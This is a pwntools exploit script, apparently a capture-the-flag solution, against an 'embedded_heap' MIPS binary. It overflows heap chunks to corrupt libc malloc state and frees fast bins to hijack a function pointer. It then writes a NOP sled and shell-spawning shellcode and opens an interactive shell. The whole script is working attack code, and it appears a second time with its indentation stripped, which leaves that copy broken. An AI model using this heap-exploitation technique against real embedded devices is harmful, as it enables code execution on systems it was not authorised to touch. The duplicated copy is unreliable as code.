theKidOfArcrania/embeded.py Secret

## embeded.py
from pwn import *

context.update(arch='mips', endian='big')
sc = shellcraft

import sys

libc_mstate = 0x66d7c
libc_fn_off = 0x7f064

def chk_size(num):
    return max((num + 4 + 7) & ~7, 0x10)

def choice(ch):
    p.sendlineafter('Command: ', str(ch))


def update(ind, data):
    p.sendlineafter('Index: ', str(ind))
    p.sendlineafter('Size: ', str(len(data)))
    p.sendafter('Content: ', data)

def free(ind):
    p.sendlineafter('Index: ', str(ind))

def exploit():
    p.recvuntil(': ')
    a = chk_size(int(p.recvuntil(' bytes', drop=True)))
    p.recvuntil(': ')
    b = chk_size(int(p.recvuntil(' bytes', drop=True)))
    p.recvuntil(': ')
    c = chk_size(int(p.recvuntil(' bytes', drop=True)))

    # Overflow heap bins
    choice(1)
    ind = (libc_fn_off - (libc_mstate+4)) // 4 + 2
    overflow = 'a' * (a - 4) + p32(ind * 8)
    overflow += 'b' * (b - 4) + p32(9) + 'cccc'
    update(0, overflow)

    # Pwn, free the fast bins, and then write shellcode
    choice(3)
    free(2)
    free(1)
    pause()
    exp = asm(sc.nop()) * ((a // 4) - 2)
    exp += asm(sc.sh())
    update(0, exp)
    p.interactive()

def login():
    global tty
    tty = process('./run.sh')
    tty.recvuntil('login: ')
    tty.info('Got login screen')
    tty.sendline('root')
    tty.recvuntil('#')
    tty.success('Ready!')

if __name__ == '__main__':
    p = None
    try:
        if sys.argv[-1] == 'remote':
            p = remote('localhost', 1235)
        elif sys.argv[-1] == 'local':
            login()
            tty.sendline('/server 1235 /embedded_heap')
            p = remote('localhost', 1235)
        elif sys.argv[-1] == 'debug':
            login()
            tty.sendline('/server 1235 gdbserver 0.0.0.0:1234 /embedded_heap')
            p = remote('localhost', 1235)
        else:
            raise ValueError('Give an option')

        exploit()
    except:
        if p: p.interactive()
        raise
	from pwn import *

	context.update(arch='mips', endian='big')
	sc = shellcraft

	import sys

	libc_mstate = 0x66d7c
	libc_fn_off = 0x7f064

	def chk_size(num):
	return max((num + 4 + 7) & ~7, 0x10)

	def choice(ch):
	p.sendlineafter('Command: ', str(ch))


	def update(ind, data):
	p.sendlineafter('Index: ', str(ind))
	p.sendlineafter('Size: ', str(len(data)))
	p.sendafter('Content: ', data)

	def free(ind):
	p.sendlineafter('Index: ', str(ind))

	def exploit():
	p.recvuntil(': ')
	a = chk_size(int(p.recvuntil(' bytes', drop=True)))
	p.recvuntil(': ')
	b = chk_size(int(p.recvuntil(' bytes', drop=True)))
	p.recvuntil(': ')
	c = chk_size(int(p.recvuntil(' bytes', drop=True)))

	# Overflow heap bins
	choice(1)
	ind = (libc_fn_off - (libc_mstate+4)) // 4 + 2
	overflow = 'a' * (a - 4) + p32(ind * 8)
	overflow += 'b' * (b - 4) + p32(9) + 'cccc'
	update(0, overflow)

	# Pwn, free the fast bins, and then write shellcode
	choice(3)
	free(2)
	free(1)
	pause()
	exp = asm(sc.nop()) * ((a // 4) - 2)
	exp += asm(sc.sh())
	update(0, exp)
	p.interactive()

	def login():
	global tty
	tty = process('./run.sh')
	tty.recvuntil('login: ')
	tty.info('Got login screen')
	tty.sendline('root')
	tty.recvuntil('#')
	tty.success('Ready!')

	if __name__ == '__main__':
	p = None
	try:
	if sys.argv[-1] == 'remote':
	p = remote('localhost', 1235)
	elif sys.argv[-1] == 'local':
	login()
	tty.sendline('/server 1235 /embedded_heap')
	p = remote('localhost', 1235)
	elif sys.argv[-1] == 'debug':
	login()
	tty.sendline('/server 1235 gdbserver 0.0.0.0:1234 /embedded_heap')
	p = remote('localhost', 1235)
	else:
	raise ValueError('Give an option')

	exploit()
	except:
	if p: p.interactive()
	raise